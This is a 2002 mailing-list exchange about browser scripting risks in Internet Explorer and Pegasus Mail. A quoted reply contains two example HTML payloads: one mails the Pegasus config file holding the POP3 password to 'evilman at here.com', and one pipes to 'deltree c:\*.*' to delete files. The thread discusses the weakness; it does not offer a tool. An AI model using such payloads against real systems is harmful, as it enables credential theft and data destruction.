Re: techport80
On 20 Sep 2002, at 18:22, Martin Stachon wrote:
>
> Kat wrote:
> > > Kat wrote:
> > > > If you have IE 6.x it may be a bit harder to disable Java, since MS has
> > > > taken
> > > >
> > > > away many of those settings which allow you to close the backdoors and
> > > > loopholes. Javascript is even worse. Do you want to show webpages, or do
> > > > you want people to open up their computers to any ole script kiddie? If
> > > > you require me to breach security on my computers to see your webpages,
> > > > let me assure you it's not worth it.
> > >
> > > You are never safe on a system where web broswer runs under root
> > > privilegies. Even with all scripting disabled.
> > >
> > > Eg. with Pegasus Mail v3.12c and IE using this HTML:
> > >
> > > <body onload="mailto:evilman at here.com -F
> > > c:\pmail\mail\Kat\pmail.ini">
> > >
> > > I can possibly obtain your POP3 password. Or this :
> > >
> > > <body onload="mailto:evilman at here.com -F c:\test.txt | deltree
> > > c:\*.*">
> > >
> > > may delete some files.
> >
> > Too bad i intentionally didn't download all the Pegasus display/scripting
> > files, and Pegasus has no clue where the IE display engine is, eh? 
>
> It has nothing to do with the display engine, just the way MSIE passes
> mailto: to Pegasus.
Oh, you meant a webpage click passing to email, i thought you meant
recieving html email into Pegasus. Still, my IE doesn't know about Pegasus
either, and i won't use Outlook Express. I copy/paste the address.
Kat
|
Not Categorized, Please Help
|
|
